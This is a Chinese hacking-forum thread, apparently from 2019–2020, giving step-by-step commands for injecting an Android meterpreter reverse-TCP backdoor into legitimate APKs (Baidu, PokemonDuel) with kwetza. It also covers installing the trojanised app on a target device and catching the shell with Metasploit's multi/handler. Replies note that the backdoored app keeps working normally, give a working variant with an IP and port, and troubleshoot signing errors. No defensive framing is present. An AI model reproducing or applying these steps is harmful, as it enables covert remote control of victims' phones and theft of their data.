kali给APP添加shell

admin · 发表于 2019-6-13 21:22:42

[pre]
git clone https://github.com/sensepost/kwetza
cd kwetza
python kwetza.py baidu.apk 监听者IP 监听端口 yes
[/pre]
#这里选取了百度的apk文件做测试
随便输入一个密码
得到新生成的apk文件
将注入完成的apk文件安装在目标设备
也可以本机
xdg-open baidu.apk
[pre]
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 监听者IP
set lport 监听端口
exploit
[/pre]

小黄人 · 发表于 2019-6-17 08:48:52

感谢分享！学习了！

Richard · 发表于 2019-6-25 12:31:10

这个给APP安装了后门后，影响原APP的正常运行吗？

admin · 发表于 2019-6-25 14:56:07

Richard 发表于 2019-6-25 04:31
这个给APP安装了后门后，影响原APP的正常运行吗？

不影响！

qwe · 发表于 2019-7-21 15:33:36

本帖最后由 qwe 于 2019-7-21 15:37 编辑

是版本的原因吗，我只能这样执行

python kwetza.py PokemonDuel.apk tcp 192.168.10.6 4444 yes AssistActivity

复制代码

admin · 发表于 2019-7-21 16:20:58

qwe 发表于 2019-7-21 07:33
是版本的原因吗，我只能这样执行

发个图片我看看！

qwe · 发表于 2019-7-23 20:42:44

本帖最后由 qwe 于 2019-7-23 20:53 编辑

必须要加https/tcp 后面加AssistActivity才可以

admin · 发表于 2019-7-24 15:39:39

qwe 发表于 2019-7-23 12:42
必须要加https/tcp 后面加AssistActivity才可以

嗯嗯！

bystart · 发表于 2020-7-27 11:20:04

Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuffer;

jarsigner 错误: java.lang.RuntimeException: 密钥库加载: Keystore was tampered with, or password was incorrect

这两个错误怎么解决呀

admin · 发表于 2020-7-27 12:46:18

bystart 发表于 2020-7-27 03:20
Exception in thread "main" java.lang.NoSuchMethodError: java.nio.ByteBuffer.clear()Ljava/nio/ByteBuf ...

你换个APP试下，有的APP是加壳的，是没法添加后门的。

kali给APP添加shell

热心会员

推广达人

宣传达人

突出贡献

优秀版主

荣誉管理

论坛元老

活跃会员